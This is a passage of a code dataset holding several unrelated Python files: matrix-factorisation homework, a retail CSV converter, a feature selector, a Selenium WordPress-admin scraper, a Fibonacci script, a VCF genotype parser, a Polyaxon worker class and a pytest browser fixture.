1])\n rating = int(X[k, 2])\n predict_rating = np.dot(u[user_id, :], v[object_id, :])\n err += np.absolute(predict_rating - rating)\n\n av_err = err / float(N)\n print('Average error: ', av_err)\n\n return av_err\n\ndef PMF(train_data, val_data, user_max_id, object_max_id, iterations=2, lam=2, sigma2=0.1, d=10):\n\n length = train_data.shape[0]\n mean = np.zeros(d)\n cov = (1/float(lam))*np.identity(d)\n L = np.zeros(iterations) #objective function\n Nu = user_max_id + 1 #int(np.amax(train_data[:, 0])) #user max index\n Nv = object_max_id + 1#int(np.amax(train_data[:, 1])) #object max index\n Mes = np.zeros((Nu, Nv)) #measured\n M = np.zeros((Nu, Nv)) #matrix of ratings\n train_err_list = []\n val_err_list = []\n\n for k in range(length):\n i = int(train_data[k, 0]) #- 1 maybe not needed if we index starting from 0\n j = int(train_data[k, 1]) #- 1\n Mes[i, j] = 1 #user ui rated movie vj\n M[i, j] = train_data[k, 2] #setting rating\n\n ##initialize locations and users\n u = np.zeros((iterations, Nu, d))\n v = np.zeros((iterations, Nv, d))\n v[0, :, :] = np.random.multivariate_normal(mean, cov, Nv) #initialize v as multivariate normal\n\n for k in range(iterations):\n print('Iteration: ', k+1, ' / ', iterations)\n\n ##update user location\n if k == 0:\n l = 0\n else:\n l = k-1\n\n for i in range(Nu):\n A = lam * sigma2 * np.identity(d)\n vec = np.zeros(d)\n for j in range(Nv):\n if Mes[i, j] == 1:\n A += np.outer(v[l, j, :], 
v[l, j, :])\n                    vec += M[i, j]*v[l, j, :]\n            u[k, i, :] = np.dot(np.linalg.inv(A), vec)\n\n        ##update object location\n        for j in range(Nv):\n            A = lam * sigma2 * np.identity(d)\n            vec = np.zeros(d)\n            for i in range(Nu):\n                if Mes[i, j] == 1:\n                    A += np.outer(u[k, i, :], u[k, i, :])\n                    vec += M[i, j]*u[k, i, :]\n            v[k, j, :] = np.dot(np.linalg.inv(A), vec)\n\n        ##update objective function\n        for i in range(Nu):\n            for j in range(Nv):\n                if Mes[i, j] == 1:\n                    L[k] -= np.square(M[i, j] - np.dot(u[k, i, :].T, v[k, j, :]))\n        L[k] = (1/(2*sigma2))*L[k]\n        L[k] -= (lam/float(2))*(np.square(np.linalg.norm(u[k, :, :])) + np.square(np.linalg.norm(v[k, :, :])))\n        print('Loss: ', L[k])\n\n        print('Training set:')\n        train_err_list.append(check_error(train_data, u[k, :, :], v[k, :, :]))\n        print('Validation set:')\n        val_err_list.append(check_error(val_data, u[k, :, :], v[k, :, :]))\n\n    return L, u, v, train_err_list, val_err_list\n\niterations = 1\ncount = 1\nbest_lam = -1\nbest_sigma2 = -1\nbest_av_err_val = 100\nbest_train_err_list = None\nbest_val_err_list = None\n\nfor i in range(count):\n    print('Parameter iteration: ', i+1, ' / ', count)\n    lam = 10**np.random.uniform(-1.5, 1.5)\n    sigma2 = 10**np.random.uniform(-1.5, 0.5)\n    print('lam:',lam, ' sigma2:', sigma2)\n    L, u_matrices, v_matrices, train_err_list, val_err_list = PMF(X_train, X_val, user_max, object_max,\n                                              iterations=iterations, lam=lam, sigma2=sigma2, d=10)\n    u = u_matrices[iterations-1, :, :]\n    v = v_matrices[iterations-1, :, :]\n    correct_train = 0\n\n    # append training set error\n\n    av_err_train = train_err_list[iterations-1]\n\n    # append validation set error\n\n    av_err_val = val_err_list[iterations-1]\n\n    if av_err_val < best_av_err_val:\n        best_av_err_val = av_err_val\n        best_lam = lam\n        best_sigma2 = sigma2\n        best_train_err_list = train_err_list\n        best_val_err_list = val_err_list\n\n# best_lam = 4.34\n# best_sigma2 = 0.8\niterations = 3\nprint('best_lam:', best_lam, ' best_sigma2:', best_sigma2)\nprint('Best validation set error: ', best_av_err_val)\nL, u_matrices, v_matrices, train_err_list, val_err_list = PMF(X_train, X_val, user_max, object_max,\n                                              iterations=iterations, lam=best_lam, sigma2=best_sigma2, d=10)\n\nL = -L\nplt.subplot(2, 1, 1)\nplt.title('Training loss')\nplt.xlabel('Iteration')\nplt.plot(L, '-o')\n\nplt.subplot(2, 1, 2)\nplt.title('Training and validation error')\nplt.xlabel('Iteration')\nplt.plot(train_err_list, '-o', label='training error')\nplt.plot(val_err_list, '-o', label='validation error')\n\nplt.gcf().set_size_inches(12, 12)\nplt.show()\n\nu = u_matrices[iterations-1, :, :]\nv = v_matrices[iterations-1, :, :]\nprint('Test set: ')\ncheck_error(X_test, u, v)\n\n\n","sub_path":"projects/pmf/hw4_PMF.py","file_name":"hw4_PMF.py","file_ext":"py","file_size_in_byte":5740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"550058735","text":"#!/usr/bin/env python\n# -*- coding: cp1251 -*-\n##\n# Arguments: 1 - input, 2 - output\n##\nimport csv\nimport sys\n\ncategory_map = {\n    \"Шубы и меха\":(\"wfurs\",129,284),\n    \"Дубленки\":(\"wskincoat\",136,284),\n    \"Пуховики\":(\"wpaddedcoat\",142,284),\n    \"Аксессуары\":(\"waccessories\",285,284),\n    \"Куртки\":(\"wtopjacket\",296,284),\n    \"Пальто\":(\"wtopcoat\",297,284),\n    \"Блузки и рубашки\":(\"wblouse\",300,284),\n    \"Брюки и джинсы\":(\"wpants\",301,284),\n    \"Жакеты и жилеты\":(\"wjacket\",302,284),\n    \"Платья\":(\"wdress\",303,284),\n    \"Юбки\":(\"wskirt\",305,284),\n    \"Кожаные куртки\":(\"wleathertopjacket\",316,284),\n    \"Кожаные пальто и 
плащи\":(\"wleathertopcoat\",317,284),\n \"Туники\":(\"wtunic\",475,284),\n \"Кардиганы и джемперы\":(\"wcardigan\",476,284),\n \"Футболки и топы\":(\"wtshort\",477,284),\n \"Кожаные куртки зимние\":(\"wwleathertopjacket\",493,284),\n \"Одежда\":(\"wclothes\",299,284),\n \"Трикотаж\":(\"wtrico\",304,284),\n \"Плащи\":(\"wtopcloak\",326,284),\n \"Ветровки\":(\"wwindbreaker\",328,284),\n \"Шорты и комбинезоны\":(\"wshorts\",478,284),\n \"Пляжная одежда и купальники\":(\"zhenskie_kupalniki\",490,284),\n \"Дубленки\":(\"mskincoat\",156,306),\n \"Пуховики\":(\"mpaddedcoat\",160,306),\n \"Аксессуары\":(\"maccessories\",307,306),\n \"Куртки\":(\"mtopjacket\",310,306),\n \"Пальто\":(\"mtopcoat\",311,306),\n \"Брюки и джинсы\":(\"mpants\",313,306),\n \"Рубашки\":(\"mshirt\",314,306),\n \"Кардиганы и джемперы\":(\"mtrico\",315,306),\n \"Кожаные куртки\":(\"mleathertopjacket\",318,306),\n \"Плащи\":(\"mtopcloak\",327,306),\n \"Футболки\":(\"mtshort\",417,306),\n \"Пиджаки \":(\"mblazer\",480,306),\n \"Куртки зимние кожаные\":(\"mwleathertopjacket\",483,306),\n \"Одежда\":(\"mclothes\",312,306),\n \"Ветровки\":(\"mwindbreaker\",329,306),\n \"Шорты\":(\"mshorts\",418,306),\n \"Пляжная одежда и купальники\":(\"muzhskie_plavki_shorti\",491,306),\n \"Выгодное предложение\":(\"wfurs_bestsell\",494,495),\n \"Женская коллекция\":(\"woman_sale\",496,495),\n \"Мужская коллекция\":(\"man_sale\",497,495)}\n#\n# \"Женская коллекция\":(284,284,\"collection\"),\n# \"Мужская коллекция\":(306,306,\"collection\"),\n# \"Предметы интерьера\":(\"home_accessories\",492,\"collection\"),\n# \"Распродажа\":(495,495,\"collection\"),\n# \"Новинки\":(\"new\",511,\"collection\")}\nbrands = dict()\nwith open(\"brands.csv\") as brands_csv:\n reader = csv.reader(brands_csv, delimiter=\";\")\n next(reader, None) # skip header\n brands = dict((rows[0],rows[1]) for rows in reader)\n\nwith open(sys.argv[1]) as csvfile:\n reader = csv.DictReader(csvfile, delimiter=\";\")\n with open(sys.argv[2], \"w\") as csv_out:\n writer = csv.DictWriter(csv_out, quoting=csv.QUOTE_NONNUMERIC, fieldnames=[\"IE_XML_ID\", \"IE_NAME\", \"IP_PROP9\", \"IE_ACTIVE\", \"IP_PROP3\", \"IMAGE_URL\", \"URL\", \"ALLCATS\", \"LEAFCAT\", \"BRAND\"], extrasaction=\"ignore\", delimiter=\";\")\n writer.writeheader()\n for row in reader:\n if row[\"IC_GROUP1\"] != \"\" and row[\"IC_GROUP2\"] != \"\":\n d = row\n d[\"IE_NAME\"] = \"{0}, {1:.0f}р.\".format(d[\"IE_NAME\"], float(d[\"IP_PROP3\"]))\n d[\"IMAGE_URL\"] = \"http://snowqueen.ru{0}\".format(d[\"IE_PREVIEW_PICTURE\"])\n category = category_map[row[\"IC_GROUP2\"]]\n d[\"URL\"] = \"http://snowqueen.ru/collection/{0}/{1}/\".format(category[0], row[\"IE_ID\"])\n d[\"ALLCATS\"] = \"|\".join(map(str, [category[2], category[1]]))\n d[\"LEAFCAT\"] = str(category[1])\n d[\"BRAND\"] = brands[row[\"IP_PROP2\"]].strip() if row[\"IP_PROP2\"] in brands else \"\"\n writer.writerow(d)\n","sub_path":"feeder/script/postprocess_catalog.py","file_name":"postprocess_catalog.py","file_ext":"py","file_size_in_byte":4067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"298068670","text":"#%%\r\n\r\n#Feature selection algorithm class \r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.preprocessing import StandardScaler, Normalizer\r\nfrom sklearn.feature_selection import mutual_info_classif, mutual_info_regression, f_regression\r\n \r\n#%%\r\n\r\nclass FeatureSelector():\r\n def __init__(self, df, target_col):\r\n self.df = df.dropna()\r\n self.df = 
self.df.select_dtypes(['number'])\r\n print(np.where(self.df.var()==0))\r\n self.df = self.df.drop(columns = self.df.columns[np.where(self.df.var()==0)]) #Entire dataset\r\n self.target_col = target_col\r\n\r\n self.y = self.df[self.target_col] #Target column for prediction\r\n self.X_raw = self.df.loc[:, self.df.columns != self.target_col] #Unscaled X values\r\n self.X = Normalizer().fit_transform(self.X_raw) #Normalize the X values\r\n self.Xdf = pd.DataFrame(self.X)\r\n self.Xdf.columns = self.X_raw.columns\r\n \r\n\r\n #Mutual Information (classification)\r\n def mutual_info_class(self):\r\n mi = mutual_info_classif(self.X, self.y)\r\n #mi = StandardScaler().fit_transform(mi.reshape(-1,1))\r\n mi_df = pd.DataFrame(mi)\r\n mi_df['Feature'] = self.X_raw.columns\r\n mi_df.columns = ['Score','Feature']\r\n mi_df = mi_df.sort_values(by = 'Score', ascending = False).loc[:,('Feature','Score')].reset_index(drop=True)\r\n return mi_df\r\n\r\n #Mutual Information (regression)\r\n def mutual_info_regress(self):\r\n mi = mutual_info_regression(self.X, self.y)\r\n #mi = StandardScaler().fit_transform(mi.reshape(-1,1))\r\n mi_df = pd.DataFrame(mi)\r\n mi_df['Feature'] = self.X_raw.columns\r\n mi_df.columns = ['Score','Feature']\r\n mi_df = mi_df.sort_values(by = 'Score', ascending = False).loc[:,('Feature','Score')].reset_index(drop=True)\r\n return mi_df\r\n\r\n def mrmr(self):\r\n # compute F-statistics and correlations\r\n F = pd.Series(f_regression(self.Xdf, self.y)[0], index = self.Xdf.columns)\r\n corr = self.Xdf.corr().abs().clip(.00001) # minimum value of correlation set to .00001 (to avoid division by zero)\r\n\r\n # initialize list of selected features and list of excluded features\r\n selected = []\r\n not_selected = list(self.Xdf.columns)\r\n\r\n # repeat K times: \r\n # compute FCQ score for all the features that are currently excluded,\r\n # then find the best one, add it to selected, and remove it from not_selected\r\n for i in range(len(self.Xdf.columns)):\r\n\r\n # compute FCQ score for all the (currently) excluded features (this is Formula 2)\r\n score = F.loc[not_selected] / corr.loc[not_selected, selected].mean(axis = 1).fillna(.00001)\r\n\r\n # find best feature, add it to selected and remove it from not_selected\r\n best = score.index[score.argmax()]\r\n selected.append(best)\r\n not_selected.remove(best)\r\n return selected\r\n\r\n","sub_path":"feature_select.py","file_name":"feature_select.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"642353409","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nimport time\r\nimport os\r\n\r\n\r\ndef login():\r\n browser.get(\"https://houhuayuan.vip\")\r\n try:\r\n browser.find_element(By.ID, \"user_login\").send_keys(\"w1g2f3\")\r\n except Exception:\r\n print('输入用户名失败')\r\n else:\r\n print('输入用户名成功')\r\n try:\r\n browser.find_element(By.ID, \"user_pass\").send_keys(\"123456\")\r\n except Exception:\r\n print('输入密码失败')\r\n else:\r\n print('输入密码成功')\r\n browser.find_element(By.NAME, \"wp-submit\").click()\r\n\r\n\r\ndef main():\r\n login()\r\n url_base = \"https://houhuayuan.vip/wp-admin/edit.php?post_status=publish&post_type=post&paged=\"\r\n n = 2\r\n with open(\"D:\\\\PYcode\\\\wwww\\\\zhaoze_url.txt\",mode = 'a+',encoding='utf-8') as f:\r\n while(n < 114):\r\n url = url_base + str(n)\r\n browser.get(url)\r\n for i in range(1, 21):\r\n name_xpath = 
\"/html/body/div/div[2]/div[2]/div[1]/div[3]/form[1]/table/tbody/tr[\"+str(i)+\"]/td[1]/strong/span\"\r\n href_xpath = \"/html/body/div/div[2]/div[2]/div[1]/div[3]/form[1]/table/tbody/tr[\"+str(i)+\"]/td[1]/div/span/a\"\r\n name = browser.find_element(By.XPATH, name_xpath)\r\n href = browser.find_element(By.XPATH, href_xpath)\r\n f.write(name.get_attribute('innerText') + \":\")\r\n f.write(\"\\n\")\r\n f.write(href.get_attribute('href'))\r\n f.write(\"\\n\")\r\n n = n +1\r\n f.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n options = webdriver.ChromeOptions()\r\n options.add_argument('-ignore-certificate-errors')\r\n # options.add_argument('-ignore -ssl-errors')\r\n # options.add_argument('-disable-software-rasterizer')\r\n browser = webdriver.Chrome(options=options)\r\n main()\r\n browser.quit()\r\n","sub_path":"list_get.py","file_name":"list_get.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"599643223","text":"n = int(input(\"Enter the no. of terms to be printed\"))\nif n == 1:\n print(\"0\")\nelif n== 2:\n print(\"0, 1\")\nelse:\n print(\"0, 1\", end = \", \")\n a, b = 0, 1\n for i in range(n-2):\n c = a+b\n print(c,end=\", \")\n a=b\n b = c\n","sub_path":"fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"175912591","text":"#!/usr/bin/env python\n\n#Various functions to parse and filter genotype data from vcf files.\n#If run independently it will pipe \"genotypes\" format to stdout. \n\nimport argparse, sys, gzip, re, subprocess\n\nimport numpy as np\n\ndef GTtype(alleles):\n alleleSet = set(alleles)\n if len(alleleSet) > 1: return \"Het\"\n elif \"0\" in alleleSet: return \"HomRef\"\n elif \".\" in alleleSet: return \"Missing\"\n else: return \"HomAlt\"\n\n\nclass VcfSite:\n \n __slots__ = ['CHROM', 'POS', 'ID', 'REF', 'ALT', 'REF_ALT', 'QUAL', 'FILTER', 'INFO', 'sampleNames', 'genoData', \"alleleDict\"]\n \n def __init__(self, elements=None, line=None, headers=None, headerLine=None, precompGenoData=None):\n assert((elements != None or line != None) and (headers != None or headerLine != None))\n if not headers: headers = headerLine.split()\n if not elements: elements = line.split()\n \n lineDict = dict(zip(headers,elements))\n \n self.CHROM = lineDict[\"#CHROM\"]\n self.POS = int(lineDict[\"POS\"])\n self.ID = lineDict[\"ID\"]\n self.REF = lineDict[\"REF\"]\n self.ALT = lineDict[\"ALT\"].split(\",\")\n self.alleleDict = dict(zip([str(i) for i in range(len(self.ALT)+1)], [self.REF] + self.ALT))\n self.QUAL = lineDict[\"QUAL\"]\n self.FILTER = lineDict[\"FILTER\"]\n self.INFO = lineDict[\"INFO\"].split(\";\")\n \n genoInfoNames = lineDict[\"FORMAT\"].split(\":\")\n \n self.sampleNames = headers[9:]\n \n self.genoData = {}\n for sampleName in self.sampleNames:\n #if pre-compiled genotype data are available, try using those \n if precompGenoData and lineDict[sampleName] in precompGenoData:\n self.genoData[sampleName] = precompGenoData[lineDict[sampleName]]\n else:\n #otherwise make dictionary for this sample\n self.genoData[sampleName] = dict(zip(genoInfoNames, lineDict[sampleName].split(\":\")))\n if \"GT\" in self.genoData[sampleName]:\n self.genoData[sampleName][\"alleles\"] = tuple(self.genoData[sampleName][\"GT\"])[::2]\n self.genoData[sampleName][\"phase\"] = \"|\" if \"|\" in self.genoData[sampleName][\"GT\"] else \"/\"\n if 
precompGenoData[\"__counter__\"] < precompGenoData[\"__maxSize__\"]:\n precompGenoData[lineDict[sampleName]] = self.genoData[sampleName]\n precompGenoData[\"__counter__\"] += 1\n \n \n def getGenotype(self, sample, gtFilters = [], withPhase=True, asNumbers = False, missing = None, allowOnly=None, keepPartial=False, ploidy=None):\n genoData = self.genoData[sample]\n if missing is None:\n if asNumbers: missing = \".\"\n else: missing = \"N\"\n \n #check each gt filter\n passed = True\n for gtFilter in gtFilters:\n #first check that it's applicable\n if (\"siteTypes\" in gtFilter and self.getType() not in gtFilter[\"siteTypes\"]): continue\n if (\"gtTypes\" in gtFilter and GTtype(genoData[\"alleles\"]) not in gtFilter[\"gtTypes\"]): continue\n if (\"samples\" in gtFilter and sample not in gtFilter[\"samples\"]): continue\n #now check that it passes\n #might be a single value, nut could be several separated by commas. So will split in case\n try:\n values = np.array(genoData[gtFilter[\"flag\"]].split(\",\"), dtype=float)\n passed = np.all(gtFilter[\"min\"] <= values) and np.all(values <= gtFilter[\"max\"])\n except: passed = False\n #try: passed = gtFilter[\"min\"] <= float(genoData[gtFilter[\"flag\"]]) <= gtFilter[\"max\"]\n #except: passed = False\n if not passed: break\n \n if ploidy is None: ploidy=len(genoData[\"alleles\"])\n \n if passed:\n if not asNumbers:\n try:\n sampleAlleles = [self.alleleDict[a] for a in genoData[\"alleles\"]]\n if allowOnly: sampleAlleles = [a if a in allowOnly else missing for a in sampleAlleles]\n if not keepPartial: sampleAlleles = sampleAlleles if missing not in sampleAlleles else [missing]*ploidy\n \n except: sampleAlleles = [missing]*ploidy\n \n else:\n sampleAlleles = genoData[\"alleles\"][:]\n \n \n else: sampleAlleles = [missing]*ploidy\n \n if withPhase: return genoData[\"phase\"].join(sampleAlleles)\n else: return \"\".join(sampleAlleles)\n \n \n def getGenotypes(self, gtFilters = [], asList = False, withPhase=True, asNumbers = False,\n samples = None, missing = None, allowOnly=None, keepPartial=False, ploidyDict=None):\n \n if not samples: samples = self.sampleNames\n output = {}\n for sample in samples:\n ploidy = ploidyDict[sample] if ploidyDict is not None else None\n output[sample] = self.getGenotype(sample, gtFilters=gtFilters, withPhase=withPhase, asNumbers=asNumbers,\n missing=missing, allowOnly=allowOnly, keepPartial=keepPartial, ploidy=ploidy)\n \n if asList: return [output[sample] for sample in samples]\n \n return output\n \n def getType(self):\n if len(self.REF) == 1:\n if self.ALT == [\".\"]: return \"mono\"\n elif max([len(a) for a in self.ALT]) == 1: return \"SNP\"\n else: return \"indel\"\n else: return \"indel\"\n \n def getGenoField(self, field, samples = None, missing=None):\n if missing is None: missing = \".\"\n if samples is None: samples = self.sampleNames\n fields = []\n for sample in samples:\n try: fields.append(self.genoData[sample][field])\n except: fields.append(missing)\n return fields\n\n\ndef parseHeaderLines(fileObj):\n output = {}\n output[\"contigs\"] = []\n output[\"contigLengths\"] = {}\n for line in fileObj:\n if line.startswith(\"##contig\"):\n contigDataDict = dict([x.split(\"=\") for x in re.split('<|>', line)[1].split(\",\")])\n elements = re.split('=|,|>', line)\n output[\"contigs\"].append(contigDataDict[\"ID\"])\n try: output[\"contigLengths\"][contigDataDict[\"ID\"]] = int(contigDataDict[\"length\"])\n except: output[\"contigLengths\"][contigDataDict[\"ID\"]] = None\n \n if line.startswith(\"#CHROM\"):\n 
output[\"mainHead\"] = line\n elements = line.split()\n output[\"sampleNames\"] = line.split()[9:]\n output[\"nSamples\"] = len(output[\"sampleNames\"])\n output[\"mainHeaders\"] = elements\n break\n \n return output\n\n\ndef getHeadData(fileName):\n with gzip.open(fileName, \"rt\") if fileName.endswith(\".gz\") else open(fileName, \"rt\") as fileObj:\n return parseHeaderLines(fileObj)\n\n\ndef parseVcfSites(lines, mainHeaders, precomp=True, precompMaxSize=10000, excludeDuplicates=False):\n if precomp:\n precompGenoData = {}\n precompGenoData[\"__maxSize__\"] = precompMaxSize\n precompGenoData[\"__counter__\"] = 0\n else: precompGenoData = None\n \n if excludeDuplicates: lastChrom = lastPos = None\n \n for elements in lines:\n if isinstance(elements, str): elements = elements.split()\n if elements[0][0] == \"#\": continue\n if excludeDuplicates:\n if elements[0] == lastChrom and elements[1] == lastPos: continue\n lastChrom = elements[0]\n lastPos = elements[1]\n yield VcfSite(elements=elements, headers=mainHeaders, precompGenoData=precompGenoData)\n\ndef canFloat(string):\n try: float(string)\n except: return False\n return True\n\ndef parseGenotypeFilterArg(arg):\n try:\n gtfDict = dict([tuple(i.split(\"=\")) for i in arg])\n for key in gtfDict.keys():\n assert key in [\"flag\",\"min\",\"max\", \"siteTypes\", \"gtTypes\", \"samples\"]\n for key in [\"siteTypes\", \"gtTypes\", \"samples\"]:\n if key in gtfDict: gtfDict[key] = gtfDict[key].split(\",\")\n gtfDict[\"min\"] = float(gtfDict[\"min\"]) if \"min\" in gtfDict else -np.inf\n gtfDict[\"max\"] = float(gtfDict[\"max\"]) if \"max\" in gtfDict else np.inf\n return gtfDict\n except: raise ValueError(\"Bad genotype filter specification. See help.\")\n\n###############################################################################################################\nif __name__ == \"__main__\":\n\n\n ### parse arguments\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--inFile\", help=\"Input vcf file\", action = \"store\")\n parser.add_argument(\"-o\", \"--outFile\", help=\"Output csv file\", action = \"store\")\n\n #specific samples\n parser.add_argument(\"-s\", \"--samples\", help=\"sample names (separated by commas)\", action='store')\n\n #contigs\n parser.add_argument(\"--include\", help=\"include contigs (separated by commas)\", action='store')\n parser.add_argument(\"--includeFile\", help=\"File of contigs (one per line)\", action='store')\n parser.add_argument(\"--exclude\", help=\"exclude contigs (separated by commas)\", action='store')\n parser.add_argument(\"--excludeFile\", help=\"File of contigs (one per line)\", action='store')\n\n\n #vcf parsing arguments\n parser.add_argument(\"--minQual\", help=\"Minimum QUAL for a site\", type=int, action = \"store\")\n parser.add_argument(\"--gtf\", help=\"Genotype filter. Syntax: flag=X min=X max=X siteTypes=X,X.. gtTypes=X,X.. 
samples=X,X..\", action = \"append\", nargs = '+')\n\n parser.add_argument(\"--skipIndels\", help=\"Skip indels\", action = \"store_true\")\n parser.add_argument(\"--skipMono\", help=\"Skip monomorphic sites\", action = \"store_true\")\n \n parser.add_argument(\"--ploidy\", help=\"Ploidy for each sample\", action = \"store\", type=int, nargs=\"+\", default=[2])\n parser.add_argument(\"--ploidyFile\", help=\"File with samples names and ploidy as columns\", action = \"store\")\n \n parser.add_argument(\"--field\", help=\"Optional - format field to extract\", action = \"store\")\n parser.add_argument(\"--missing\", help=\"Value to use for missing data\", action = \"store\")\n parser.add_argument(\"--outSep\", help=\"Output separator\", action = \"store\", default = \"\\t\")\n\n args = parser.parse_args()\n\n samples = args.samples\n\n if samples: samples = samples.split(\",\")\n\n include = []\n exclude = []\n\n if args.include: include += args.include.split(\",\")\n if args.exclude: exclude += args.exclude.split(\",\")\n\n if args.includeFile:\n with open(args.includeFile, 'r') as includeFile:\n include += [c.strip() for c in includeFile.read().split(\"\\n\")]\n\n if args.excludeFile:\n with open(args.excludeFile, 'r') as excludeFile:\n exclude += [c.strip() for c in excludeFile.read().split(\"\\n\")]\n\n if len(include) >= 1:\n include = set(include)\n sys.stderr.write(\"{} contigs will be included.\".format(len(include)))\n \n if len(exclude) >= 1:\n exclude = set(exclude)\n sys.stderr.write(\"{} contigs will be excluded.\".format(len(exclude)))\n \n gtFilters = [parseGenotypeFilterArg(gtf) for gtf in args.gtf] if args.gtf else []\n \n ##########################################################################################################################\n\n ### open files\n\n if args.inFile: inFile = gzip.open(args.inFile, \"rt\") if args.inFile.endswith(\".gz\") else open(args.inFile, \"rt\")\n else: inFile = sys.stdin\n\n\n if args.outFile: outFile = gzip.open(args.outFile, \"w\") if args.outFile.endswith(\".gz\") else open(args.outFile, \"w\")\n else: outFile = sys.stdout\n \n #header data\n headData = parseHeaderLines(inFile)\n \n #check specified samples are in first file. 
Otherwise use this entire set \n if samples:\n for sample in samples: assert sample in headData[\"sampleNames\"], \"Specified sample name not in VCF header.\"\n else: samples = headData[\"sampleNames\"]\n \n if args.ploidyFile is not None:\n with open(args.ploidyFile, \"rt\") as pf: ploidyDict = dict([[s[0],int(s[1])] for s in [l.split() for l in pf]])\n else:\n ploidy = args.ploidy if len(args.ploidy) != 1 else args.ploidy*len(samples)\n assert len(ploidy) == len(samples), \"Incorrect number of ploidy values supplied.\"\n ploidyDict = dict(zip(samples,ploidy))\n\n\n ##########################################################################################################################\n\n outFile.write(args.outSep.join([\"#CHROM\", \"POS\"] + samples) + \"\\n\")\n \n for vcfSite in parseVcfSites(inFile, headData[\"mainHeaders\"]):\n if (exclude and vcfSite.CHROM in exclude) or (include and vcfSite.CHROM not in include): continue\n if args.skipMono and vcfSite.getType() is \"mono\": continue\n if args.minQual and canFloat(vcfSite.QUAL) and float(vcfSite.QUAL) < args.minQual: continue\n if args.field is not None: output = vcfSite.getGenoField(args.field,samples=samples, missing=args.missing)\n else:\n allowed=[\"A\",\"C\",\"G\",\"T\"] if args.skipIndels else None\n output = vcfSite.getGenotypes(gtFilters,asList=True,withPhase=True,samples=samples,missing=args.missing,\n allowOnly=allowed,keepPartial=False,ploidyDict=ploidyDict)\n outFile.write(args.outSep.join([vcfSite.CHROM, str(vcfSite.POS)] + output) + \"\\n\")\n \n outFile.close()\n","sub_path":"07.fd/parseVCF.py","file_name":"parseVCF.py","file_ext":"py","file_size_in_byte":13434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"37394777","text":"#!/usr/bin/python\n#\n# Copyright 2018-2022 Polyaxon, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport atexit\nimport os\nimport threading\n\n\nclass BaseWorker:\n NAME = None\n\n def __init__(self):\n assert self.NAME, \"Worker class `{}` must have a valid name.\".format(\n self.__class__.__name__\n )\n self._lock = threading.Lock()\n self._thread = None\n self._thread_for_pid = None\n\n def is_alive(self):\n if self._thread_for_pid != os.getpid():\n return False\n return bool(self._thread and self._thread.is_alive())\n\n def is_running(self):\n if self.is_alive():\n return\n self.start()\n\n def start(self):\n self._lock.acquire()\n try:\n if not self.is_alive():\n self._thread = threading.Thread(target=self._target, name=self.NAME)\n self._thread.setDaemon(True)\n self._thread.start()\n self._thread_for_pid = os.getpid()\n finally:\n self._lock.release()\n atexit.register(self.atexit)\n\n def atexit(self):\n raise NotImplementedError(\"Worker must implement `atexit` function.\")\n\n def _target(self):\n raise NotImplementedError(\"Worker must implement `target` 
function.\")\n","sub_path":"core/polyaxon/client/workers/base_worker.py","file_name":"base_worker.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"138259169","text":"import pytest\nimport allure\nfrom selenium import webdriver\nimport datetime\nimport pip\nimport platform\nimport xdist\nimport selenium\nimport os\n\n\ndef pytest_addoption(parser):\n parser.addoption('--browser', action='store', default='chrome', help='Available: chrome, firefox, opera')\n parser.addoption('--executor', action='store', default='local', help='Choose execute: local, selenoid')\n parser.addoption('--vnc', action='store', default='disable', help='enableVNC: enable, disable')\n parser.addoption('--video', action='store', default='disable', help='Saving Video: enable, disable')\n\n\n@pytest.hookimpl(hookwrapper=True, tryfirst=True)\ndef pytest_runtest_makereport(item, call):\n outcome = yield\n rep = outcome.get_result()\n setattr(item, \"rep_\" + rep.when, rep)\n return rep\n\n\n@pytest.fixture(scope='function')\ndef browser(request):\n with allure.step('Запускаем браузер'):\n if request.config.getoption('--executor') == 'selenoid':\n\n capabilities = {\n \"browserName\": request.config.getoption('--browser'),\n \"enableVNC\": False if request.config.getoption('--vnc') == 'disable' else True,\n \"enableVideo\": False if request.config.getoption('--video') == 'disable' else True,\n \"env\": [\"TZ=Europe/Moscow\"]\n }\n\n browser = webdriver.Remote(command_executor=\"http://localhost:4444/wd/hub\",\n desired_capabilities=capabilities)\n\n elif request.config.getoption('--executor') == 'local':\n if request.config.getoption('--browser') == 'chrome':\n browser = webdriver.Chrome()\n\n elif request.config.getoption('--browser') == 'firefox':\n browser = webdriver.Firefox()\n\n elif request.config.getoption('--browser') == 'opera':\n browser = webdriver.Opera()\n browser.set_window_position(0, 0)\n browser.set_window_size(1920, 1080)\n browser.implicitly_wait(10)\n yield browser\n\n if request.config.getoption('--alluredir') == 'allure_results':\n env_file = open('./allure_results/environment.properties', 'w+')\n env_file.write(f'OS.version={platform.platform()}'\n f'\\nPython.version={platform.python_version()}'\n f'\\nPytest.version={pytest.__version__}'\n f'\\nSelenium.version={selenium.__version__}'\n f'\\nPip.version={pip.__version__}'\n f'\\nXdist.version={xdist.__version__}'\n f'\\nExecutor.type={request.config.getoption(\"--executor\")}'\n f'\\nBrowser={request.config.getoption(\"--browser\")}')\n env_file.close()\n\n if request.node.rep_call.failed:\n try:\n browser.execute_script(\"document.body.bgColor = 'white';\")\n date = 